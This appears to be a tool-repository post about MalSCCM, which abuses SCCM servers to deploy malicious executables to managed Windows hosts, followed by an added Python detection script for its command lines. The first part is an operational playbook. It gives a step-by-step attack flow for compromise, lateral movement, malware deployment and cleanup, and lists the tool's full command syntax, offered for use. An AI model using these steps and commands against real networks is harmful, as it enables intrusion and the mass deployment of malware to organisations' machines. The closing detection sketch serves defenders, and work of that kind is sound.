MalSCCM - Tool To Abuse Local Or Remote SCCM Servers To Deploy Malicious Applications

Source: kitploit.com


This tool allows you to abuse local or remote SCCM servers to deploy malicious applications to hosts they manage. To use this tool your current process must have admin rights over the SCCM server.

Typically, SCCM deployments have the management server and the primary server on the same host, in which case the host returned from the locate command can be used as the primary server.

If that is not the case you will need to compromise the management host returned with locate so that you can then run locate again on that host and get the primary server hostname. Once you have that and admin access you are good to go!


Blog

For more information on usage of the tool, refer to the blog below.

Credits

Massive credit to PowerSCCM (https://github.com/PowerShellMafia/PowerSCCM) which this is all based off, this would not have been done without the work of @harmj0y, @jaredcatkinson, @enigma0x3, @mattifestation.

Attack Flow

  • Compromise client, use locate to find management server
  • Compromise management server, use locate to find primary server
  • Use inspect on primary server to view who you can target
  • Create a new device group for the machines you want to laterally move to
  • Add your targets into the new group
  • Create an application pointing to a malicious EXE on a world readable share
  • Deploy the application to the target group
  • Force the target group to check in for updates
  • Profit...
  • Cleanup the application and deployment
  • Delete the group

Help menu

Commands listed below have optional parameters in <>. 

Attempt to find the SCCM management and primary servers:
MalSCCM.exe locate

Inspect the primary server to gather SCCM information:
MalSCCM.exe inspect </server:PrimarySiteHostname> </all /computers /deployments /groups /applications /forest /packages /primaryusers>

Create/Modify/Delete Groups to add targets in for deploying malicious apps. Groups can either be for devices or users:
MalSCCM.exe group /create /groupname:example /grouptype:[user|device] </server:PrimarySiteHostname>
MalSCCM.exe group /delete /groupname:example </server:PrimarySiteHostname>
MalSCCM.exe group /addhost /groupname:example /host:examplehost </server:PrimarySiteHostname>
MalSCCM.exe group /adduser /groupname:example /user:exampleuser </server:PrimarySiteHostname>

Create/Deploy/Delete malicious applications:
MalSCCM.exe app /create /name:appname /uncpath:"\\unc\path" </server:PrimarySiteHostname>
MalSCCM.exe app /delete /name:appname </server:PrimarySiteHostname>
MalSCCM.exe app /deploy /name:appname /groupname:example /assignmentname:example2 </server:PrimarySiteHostname>
MalSCCM.exe app /deletedeploy /name:appname </server:PrimarySiteHostname>
MalSCCM.exe app /cleanup /name:appname </server:PrimarySiteHostname>

Force devices of a group to checkin within a couple minutes:
MalSCCM.exe checkin /groupname:example </server:PrimarySiteHostname>
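
For defenders, the argument grammar in the help menu above is a usable detection surface in process-creation logs (for example Sysmon event 1 or Windows event 4688 with command-line auditing). The sketch below is an added example, not part of MalSCCM or the original post: it matches the verb and switch combinations regardless of image name and flags hosts where the create, deploy and check-in stages appear in order. Host names, paths and the sample records are constructed.

```python
import re

TOKEN = re.compile(r'(?:[^\s"]|"[^"]*")+')  # keeps /uncpath:"\\a\b c" as one token

# (verb, action switch) -> (stage, required /key:value arguments), per the help menu
RULES = {
    ("group", "/create"): ("group_create", {"groupname", "grouptype"}),
    ("group", "/addhost"): ("group_add_target", {"groupname", "host"}),
    ("group", "/adduser"): ("group_add_target", {"groupname", "user"}),
    ("app", "/create"): ("app_create", {"name", "uncpath"}),
    ("app", "/deploy"): ("app_deploy", {"name", "groupname", "assignmentname"}),
    ("checkin", None): ("force_checkin", {"groupname"}),
}
CHAIN = ["group_create", "app_create", "app_deploy", "force_checkin"]

def classify(cmdline):
    """Stage name if the arguments fit the help-menu grammar, else None.
    The image name is ignored: a renamed binary still takes the same arguments."""
    toks = [t.lower() for t in TOKEN.findall(cmdline)][1:]  # drop the image path
    if not toks:
        return None
    args = [t for t in toks[1:] if t.startswith("/")]
    switches = {t for t in args if ":" not in t}
    keys = {t[1:].split(":", 1)[0] for t in args if ":" in t}
    for (verb, action), (stage, required) in RULES.items():
        if verb == toks[0] and action in (None, *switches) and required <= keys:
            return stage
    return None

def hosts_with_deploy_chain(events):
    """events: (host, command line) in time order. Hosts where CHAIN ran in order."""
    progress, hits = {}, []
    for host, cmdline in events:
        step = progress.get(host, 0)
        if step < len(CHAIN) and classify(cmdline) == CHAIN[step]:
            progress[host] = step + 1
            if step + 1 == len(CHAIN):
                hits.append(host)
    return hits

# Constructed process-creation records (host, command line); all names are made up.
SAMPLE = [
    ("WS01", r'C:\Users\Public\upd.exe group /create /groupname:example /grouptype:device /server:SITE01'),
    ("WS02", r'C:\Windows\System32\net.exe group /domain'),
    ("WS01", r'C:\Users\Public\upd.exe group /addhost /groupname:example /host:examplehost'),
    ("WS01", r'C:\Users\Public\upd.exe app /create /name:appname /uncpath:"\\fs01\share\a.exe"'),
    ("WS01", r'C:\Users\Public\upd.exe app /deploy /name:appname /groupname:example /assignmentname:example2'),
    ("WS01", r'C:\Users\Public\upd.exe checkin /groupname:example'),
]

if __name__ == "__main__":
    print(hosts_with_deploy_chain(SAMPLE))
```

Matching on arguments rather than on the file name MalSCCM.exe keeps the rule effective when the binary is renamed; a recompiled build with different switch names would need its own rule set.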


...